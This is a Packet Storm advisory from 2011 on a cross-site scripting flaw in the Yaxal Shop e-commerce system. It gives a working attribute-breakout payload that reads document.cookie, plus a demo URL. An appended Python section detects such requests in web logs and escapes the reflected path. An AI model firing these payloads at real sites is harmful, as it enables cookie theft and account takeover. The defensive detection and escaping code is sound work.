Yaxal Shop Cross Site Scripting

2011-08-22T00:00:00
ID PACKETSTORM:104311
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-22T00:00:00

Description

                                        
`# Exploit Title: Yaxal Shop (E-Commerce System) Stored XSS  
# Date: 2011  
# Author: Eyup CELIK  
# Software Link: http://www.polyspaston.com/content_shopdirector.php  
# Version: All Versions  
# Tested on: All versions are vulnerable  
  
ISSUE  
  
Cross-site scripting can be performed through user-supplied input  
  
Vulnerable Pages:  
yaxal_products.php  
yaxal_user.php  
  
Example:  
yaxal_user.php/<XSS Code>  
yaxal_products.php/<XSS Code>  
  
Exploit:  
"onmouseover=prompt(document.cookie)>  
  
Demo:  
http://demo.yaxal.com/yaxal_products.php/%22onmouseover=prompt%28905645%29%3E  
  
  
Thanks,  
  
  
Eyup CELIK  
Information Technology Security Expert  
http://www.eyupcelik.com.tr  
`
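
For defenders, the request shape in the advisory (extra path segments after a `.php` script name, carrying a quote and an inline event handler) can be flagged in web server logs and neutralised at output time. The following is an added example, not code from the advisory or from Yaxal Shop: the log lines are constructed, `classify`, `scan` and `render_link` are hypothetical helper names, and it assumes the application reflects the request path into a double-quoted HTML attribute.

```python
import html
import re
from urllib.parse import unquote

# Path info after a .php script name, as in yaxal_products.php/<input>
PATH_INFO = re.compile(r"^(?P<script>/[^?\s]*?\.php)/(?P<extra>[^?]*)")
BREAKOUT = re.compile(r"[\"'<>`]")           # can close a quoted attribute or a tag
HANDLER = re.compile(r"\bon[a-z]+\s*=", re.I)  # inline event handler such as onmouseover=

def decode(path, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(rounds):
        nxt = unquote(path)
        if nxt == path:
            break
        path = nxt
    return path

def classify(request_path):
    """Return (script, reasons); reasons is empty when the path info looks clean."""
    m = PATH_INFO.match(decode(request_path))
    if not m:
        return None, []
    extra, reasons = m.group("extra"), []
    if BREAKOUT.search(extra):
        reasons.append("attribute/tag breakout character in path info")
    if HANDLER.search(extra):
        reasons.append("inline event handler in path info")
    return m.group("script"), reasons

def render_link(request_path):
    """Hardened output (assumed sink): escape the reflected path for a quoted attribute."""
    return '<a href="%s">' % html.escape(decode(request_path, 1), quote=True)

# Constructed access-log lines (combined log format), not real traffic
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Aug/2011:10:00:01 +0000] "GET /yaxal_products.php?id=4 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [22/Aug/2011:10:00:07 +0000] "GET /yaxal_products.php/%22onmouseover=prompt%28905645%29%3E HTTP/1.1" 200 5301',
    '198.51.100.9 - - [22/Aug/2011:10:00:09 +0000] "GET /yaxal_user.php/%2522onfocus%253Dx HTTP/1.1" 200 4010',
    '198.51.100.3 - - [22/Aug/2011:10:00:12 +0000] "GET /yaxal_user.php/profile HTTP/1.1" 200 3999',
]

def scan(lines):
    """Return (script, reasons) for every log line whose path info is flagged."""
    paths = (line.split('"')[1].split()[1] for line in lines)
    return [hit for hit in map(classify, paths) if hit[1]]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Escaping with `quote=True` turns the double quote into `&quot;`, so the reflected value stays inside the attribute instead of closing it.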